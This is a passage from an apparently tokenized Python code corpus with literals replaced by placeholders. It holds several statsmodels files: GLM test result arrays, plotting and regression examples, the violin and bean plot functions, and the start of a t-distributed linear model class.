split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> predict_mu = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> predict_mu_colnames = '<STR_LIT>' . 
split ( ) <EOL> predict_mu_rownames = '<STR_LIT>' . split ( ) <EOL> predict_linpred_std = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> predict_linpred_std_colnames = '<STR_LIT>' . split ( ) <EOL> predict_linpred_std_rownames = '<STR_LIT>' . split ( ) <EOL> predict_hat = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> predict_hat_colnames = '<STR_LIT>' . split ( ) <EOL> predict_hat_rownames = '<STR_LIT>' . 
split ( ) <EOL> results_constraint2 = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> predict_mu = predict_mu , <EOL> predict_mu_colnames = predict_mu_colnames , <EOL> predict_mu_rownames = predict_mu_rownames , <EOL> predict_linpred_std = predict_linpred_std , <EOL> predict_linpred_std_colnames = predict_linpred_std_colnames , <EOL> predict_linpred_std_rownames = predict_linpred_std_rownames , <EOL> predict_hat = predict_hat , <EOL> predict_hat_colnames = predict_hat_colnames , <EOL> predict_hat_rownames = predict_hat_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:3> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , 
<EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . 
split ( ) <EOL> results_constraint2_robust = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> N_cds = <NUM_LIT:0> , <EOL> N_cdf = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> k_eq_model = <NUM_LIT:1> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> rc = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:5> , <EOL> N = <NUM_LIT:32> , <EOL> rank = <NUM_LIT:3> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> estat_cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . 
reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> results_logit_constraint2 = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from statsmodels . nonparametric . api import KernelReg <EOL> import statsmodels . sandbox . nonparametric . dgp_examples as dgp <EOL> seed = np . random . randint ( <NUM_LIT> ) <EOL> seed = <NUM_LIT> <EOL> print ( seed ) <EOL> np . random . seed ( seed ) <EOL> funcs = [ dgp . UnivariateFanGijbels1 ( ) , <EOL> dgp . UnivariateFanGijbels2 ( ) , <EOL> dgp . UnivariateFanGijbels1EU ( ) , <EOL> dgp . UnivariateFunc1 ( ) <EOL> ] <EOL> res = [ ] <EOL> fig = plt . figure ( ) <EOL> for i , func in enumerate ( funcs ) : <EOL> f = func <EOL> model = KernelReg ( endog = [ f . y ] , exog = [ f . x ] , reg_type = '<STR_LIT>' , <EOL> var_type = '<STR_LIT:c>' , bw = '<STR_LIT>' ) <EOL> mean , mfx = model . fit ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , i + <NUM_LIT:1> ) <EOL> f . plot ( ax = ax ) <EOL> ax . plot ( f . x , mean , color = '<STR_LIT:r>' , lw = <NUM_LIT:2> , label = '<STR_LIT>' ) <EOL> ax . legend ( loc = '<STR_LIT>' ) <EOL> res . append ( ( model , mean , mfx ) ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> fig . show ( ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import statsmodels . api as sm <EOL> plt . rcParams [ '<STR_LIT>' ] = <NUM_LIT> <EOL> data = sm . datasets . anes96 . load_pandas ( ) <EOL> party_ID = np . arange ( <NUM_LIT:7> ) <EOL> labels = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> age = [ data . exog [ '<STR_LIT>' ] [ data . endog == id ] for id in party_ID ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> sm . graphics . violinplot ( age , ax = ax , labels = labels , <EOL> plot_opts = { '<STR_LIT>' : <NUM_LIT:5> , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> } ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> fig2 = plt . figure ( ) <EOL> ax = fig2 . add_subplot ( <NUM_LIT> ) <EOL> sm . graphics . beanplot ( age , ax = ax , labels = labels , <EOL> plot_opts = { '<STR_LIT>' : <NUM_LIT:5> , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> } ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> fig3 = plt . figure ( ) <EOL> ax = fig3 . add_subplot ( <NUM_LIT> ) <EOL> plot_opts = { '<STR_LIT>' : <NUM_LIT:5> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> , '<STR_LIT>' : ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : '<STR_LIT:.>' , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> sm . graphics . beanplot ( age , ax = ax , labels = labels , jitter = True , <EOL> plot_opts = plot_opts ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> ix = data . exog [ '<STR_LIT>' ] < <NUM_LIT:16> <EOL> age = data . 
exog [ '<STR_LIT>' ] [ ix ] <EOL> endog = data . endog [ ix ] <EOL> age_lower_income = [ age [ endog == id ] for id in party_ID ] <EOL> ix = data . exog [ '<STR_LIT>' ] >= <NUM_LIT:20> <EOL> age = data . exog [ '<STR_LIT>' ] [ ix ] <EOL> endog = data . endog [ ix ] <EOL> age_higher_income = [ age [ endog == id ] for id in party_ID ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> plot_opts [ '<STR_LIT>' ] = ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) <EOL> plot_opts [ '<STR_LIT>' ] = False <EOL> plot_opts [ '<STR_LIT>' ] = False <EOL> plot_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> plot_opts [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> sm . graphics . beanplot ( age_lower_income , ax = ax , labels = labels , side = '<STR_LIT:left>' , <EOL> jitter = True , plot_opts = plot_opts ) <EOL> plot_opts [ '<STR_LIT>' ] = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> plot_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> plot_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> sm . graphics . beanplot ( age_higher_income , ax = ax , labels = labels , side = '<STR_LIT:right>' , <EOL> jitter = True , plot_opts = plot_opts ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> plt . show ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import print_function <EOL> import numpy as np <EOL> import statsmodels . api as sm <EOL> import matplotlib . pyplot as plt <EOL> from statsmodels . sandbox . regression . predstd import wls_prediction_std <EOL> np . random . seed ( <NUM_LIT> ) <EOL> nsample = <NUM_LIT:50> <EOL> x1 = np . linspace ( <NUM_LIT:0> , <NUM_LIT:20> , nsample ) <EOL> sig = <NUM_LIT:1.> <EOL> xg = np . zeros ( nsample , int ) <EOL> xg [ <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> xg [ <NUM_LIT> : ] = <NUM_LIT:2> <EOL> dummy = ( xg [ : , None ] == np . unique ( xg ) ) . astype ( float ) <EOL> X = np . c_ [ x1 , dummy [ : , <NUM_LIT:1> : ] , np . ones ( nsample ) ] <EOL> beta = [ <NUM_LIT:1.> , <NUM_LIT:3> , - <NUM_LIT:3> , <NUM_LIT:10> ] <EOL> y_true = np . dot ( X , beta ) <EOL> y = y_true + sig * np . random . normal ( size = nsample ) <EOL> res2 = sm . OLS ( y , X ) . fit ( ) <EOL> print ( res2 . params ) <EOL> print ( res2 . bse ) <EOL> prstd , iv_l , iv_u = wls_prediction_std ( res2 ) <EOL> plt . figure ( ) <EOL> plt . plot ( x1 , y , '<STR_LIT:o>' , x1 , y_true , '<STR_LIT>' ) <EOL> plt . plot ( x1 , res2 . fittedvalues , '<STR_LIT>' ) <EOL> plt . plot ( x1 , iv_u , '<STR_LIT>' ) <EOL> plt . plot ( x1 , iv_l , '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . show ( ) <EOL> R = [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ] <EOL> print ( "<STR_LIT>" ) <EOL> print ( res2 . f_test ( R ) ) </s>
<s> """<STR_LIT>""" <EOL> from statsmodels . compat . python import zip <EOL> import numpy as np <EOL> from scipy . stats import gaussian_kde <EOL> from . import utils <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def violinplot ( data , ax = None , labels = None , positions = None , side = '<STR_LIT>' , <EOL> show_boxplot = True , plot_opts = { } ) : <EOL> """<STR_LIT>""" <EOL> fig , ax = utils . create_mpl_ax ( ax ) <EOL> if positions is None : <EOL> positions = np . arange ( len ( data ) ) + <NUM_LIT:1> <EOL> pos_span = np . max ( positions ) - np . min ( positions ) <EOL> width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . get ( '<STR_LIT>' , <NUM_LIT> ) / <NUM_LIT> ] ) <EOL> for pos_data , pos in zip ( data , positions ) : <EOL> xvals , violin = _single_violin ( ax , pos , pos_data , width , side , <EOL> plot_opts ) <EOL> if show_boxplot : <EOL> ax . boxplot ( data , notch = <NUM_LIT:1> , positions = positions , vert = <NUM_LIT:1> ) <EOL> _set_ticks_labels ( ax , data , labels , positions , plot_opts ) <EOL> return fig <EOL> def _single_violin ( ax , pos , pos_data , width , side , plot_opts ) : <EOL> """<STR_LIT>""" <EOL> def _violin_range ( pos_data , plot_opts ) : <EOL> """<STR_LIT>""" <EOL> cutoff = plot_opts . get ( '<STR_LIT>' , False ) <EOL> cutoff_type = plot_opts . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> cutoff_val = plot_opts . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> s = <NUM_LIT:0.0> <EOL> if not cutoff : <EOL> if cutoff_type == '<STR_LIT>' : <EOL> s = cutoff_val * np . std ( pos_data ) <EOL> else : <EOL> s = cutoff_val <EOL> x_lower = kde . dataset . min ( ) - s <EOL> x_upper = kde . dataset . max ( ) + s <EOL> return np . linspace ( x_lower , x_upper , <NUM_LIT:100> ) <EOL> pos_data = np . asarray ( pos_data ) <EOL> kde = gaussian_kde ( pos_data ) <EOL> xvals = _violin_range ( pos_data , plot_opts ) <EOL> violin = kde . evaluate ( xvals ) <EOL> violin = width * violin / violin . 
max ( ) <EOL> if side == '<STR_LIT>' : <EOL> envelope_l , envelope_r = ( - violin + pos , violin + pos ) <EOL> elif side == '<STR_LIT:right>' : <EOL> envelope_l , envelope_r = ( pos , violin + pos ) <EOL> elif side == '<STR_LIT:left>' : <EOL> envelope_l , envelope_r = ( - violin + pos , pos ) <EOL> else : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> ax . fill_betweenx ( xvals , envelope_l , envelope_r , <EOL> facecolor = plot_opts . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> edgecolor = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:k>' ) , <EOL> lw = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:1> ) , <EOL> alpha = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) ) <EOL> return xvals , violin <EOL> def _set_ticks_labels ( ax , data , labels , positions , plot_opts ) : <EOL> """<STR_LIT>""" <EOL> ax . set_xlim ( [ np . min ( positions ) - <NUM_LIT:0.5> , np . max ( positions ) + <NUM_LIT:0.5> ] ) <EOL> ax . set_xticks ( positions ) <EOL> label_fontsize = plot_opts . get ( '<STR_LIT>' ) <EOL> label_rotation = plot_opts . get ( '<STR_LIT>' ) <EOL> if label_fontsize or label_rotation : <EOL> from matplotlib . artist import setp <EOL> if labels is not None : <EOL> if not len ( labels ) == len ( data ) : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> xticknames = ax . set_xticklabels ( labels ) <EOL> if label_fontsize : <EOL> setp ( xticknames , fontsize = label_fontsize ) <EOL> if label_rotation : <EOL> setp ( xticknames , rotation = label_rotation ) <EOL> return <EOL> def beanplot ( data , ax = None , labels = None , positions = None , side = '<STR_LIT>' , <EOL> jitter = False , plot_opts = { } ) : <EOL> """<STR_LIT>""" <EOL> fig , ax = utils . create_mpl_ax ( ax ) <EOL> if positions is None : <EOL> positions = np . arange ( len ( data ) ) + <NUM_LIT:1> <EOL> pos_span = np . max ( positions ) - np . min ( positions ) <EOL> violin_width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . 
get ( '<STR_LIT>' , <NUM_LIT> ) / <NUM_LIT> ] ) <EOL> bean_width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) / <NUM_LIT> ] ) <EOL> bean_mean_width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) / <NUM_LIT> ] ) <EOL> legend_txt = plot_opts . get ( '<STR_LIT>' , None ) <EOL> for pos_data , pos in zip ( data , positions ) : <EOL> xvals , violin = _single_violin ( ax , pos , pos_data , violin_width , side , plot_opts ) <EOL> if jitter : <EOL> jitter_coord = pos + _jitter_envelope ( pos_data , xvals , violin , side ) <EOL> ax . plot ( jitter_coord , pos_data , ls = '<STR_LIT>' , <EOL> marker = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:o>' ) , <EOL> ms = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:4> ) , <EOL> mec = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:k>' ) , <EOL> mew = <NUM_LIT:1> , mfc = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:none>' ) , <EOL> label = legend_txt ) <EOL> else : <EOL> ax . hlines ( pos_data , pos - bean_width , pos + bean_width , <EOL> lw = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) , <EOL> color = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:k>' ) , <EOL> label = legend_txt ) <EOL> if legend_txt is not None : <EOL> _show_legend ( ax ) <EOL> legend_txt = None <EOL> if plot_opts . get ( '<STR_LIT>' , True ) : <EOL> ax . hlines ( np . mean ( pos_data ) , pos - bean_mean_width , pos + bean_mean_width , <EOL> lw = plot_opts . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> color = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:b>' ) ) <EOL> if plot_opts . get ( '<STR_LIT>' , True ) : <EOL> ax . plot ( pos , np . median ( pos_data ) , <EOL> marker = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:+>' ) , <EOL> color = plot_opts . 
get ( '<STR_LIT>' , '<STR_LIT:r>' ) ) <EOL> _set_ticks_labels ( ax , data , labels , positions , plot_opts ) <EOL> return fig <EOL> def _jitter_envelope ( pos_data , xvals , violin , side ) : <EOL> """<STR_LIT>""" <EOL> if side == '<STR_LIT>' : <EOL> low , high = ( - <NUM_LIT:1.> , <NUM_LIT:1.> ) <EOL> elif side == '<STR_LIT:right>' : <EOL> low , high = ( <NUM_LIT:0> , <NUM_LIT:1.> ) <EOL> elif side == '<STR_LIT:left>' : <EOL> low , high = ( - <NUM_LIT:1.> , <NUM_LIT:0> ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % side ) <EOL> jitter_envelope = np . interp ( pos_data , xvals , violin ) <EOL> jitter_coord = jitter_envelope * np . random . uniform ( low = low , high = high , <EOL> size = pos_data . size ) <EOL> return jitter_coord <EOL> def _show_legend ( ax ) : <EOL> """<STR_LIT>""" <EOL> leg = ax . legend ( loc = <NUM_LIT:1> , shadow = True , fancybox = True , labelspacing = <NUM_LIT> , <EOL> borderpad = <NUM_LIT> ) <EOL> ltext = leg . get_texts ( ) <EOL> llines = leg . get_lines ( ) <EOL> frame = leg . get_frame ( ) <EOL> from matplotlib . artist import setp <EOL> setp ( ltext , fontsize = '<STR_LIT>' ) <EOL> setp ( llines , linewidth = <NUM_LIT:1> ) </s>
<s> from . foreign import StataReader , genfromdta , savetxt <EOL> from . table import SimpleTable , csv2st <EOL> from . smpickle import save_pickle , load_pickle <EOL> from statsmodels import NoseWrapper as Tester <EOL> test = Tester ( ) . test </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from scipy import special <EOL> np_log = np . log <EOL> np_pi = np . pi <EOL> sps_gamln = special . gammaln <EOL> from statsmodels . base . model import GenericLikelihoodModel <EOL> class TLinearModel ( GenericLikelihoodModel ) : <EOL> '''<STR_LIT>''' <EOL> def initialize ( self ) : <EOL> self . k_vars = self . exog . shape [ <NUM_LIT:1> ] <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . fix_df = False <EOL> if self . fix_df is False : <EOL> self . fixed_params = None <EOL> self . fixed_paramsmask = None <EOL> self . k_params = self . exog . shape [ <NUM_LIT:1> ] + <NUM_LIT:2> <EOL> extra_params_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> self . k_params = self . exog . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> fixdf = np . nan * np . zeros ( self . exog . shape [ <NUM_LIT:1> ] + <NUM_LIT:2> ) <EOL> fixdf [ - <NUM_LIT:2> ] = self . fix_df <EOL> self . fixed_params = fixdf <EOL> self . fixed_paramsmask = np . isnan ( fixdf ) <EOL> extra_params_names = [ '<STR_LIT>' ] <EOL> self . _set_extra_params_names ( extra_params_names ) <EOL> self . _set_start_params ( ) <EOL> super ( TLinearModel , self ) . initialize ( ) <EOL> def _set_start_params ( self , start_params = None , use_kurtosis = False ) : <EOL> if start_params is not None : <EOL> self . start_params = start_params <EOL> else : <EOL> from statsmodels . regression . linear_model import OLS <EOL> res_ols = OLS ( self . endog , self . exog ) . fit ( ) <EOL> start_params = <NUM_LIT:0.1> * np . ones ( self . k_params ) <EOL> start_params [ : self . k_vars ] = res_ols . params <EOL> if self 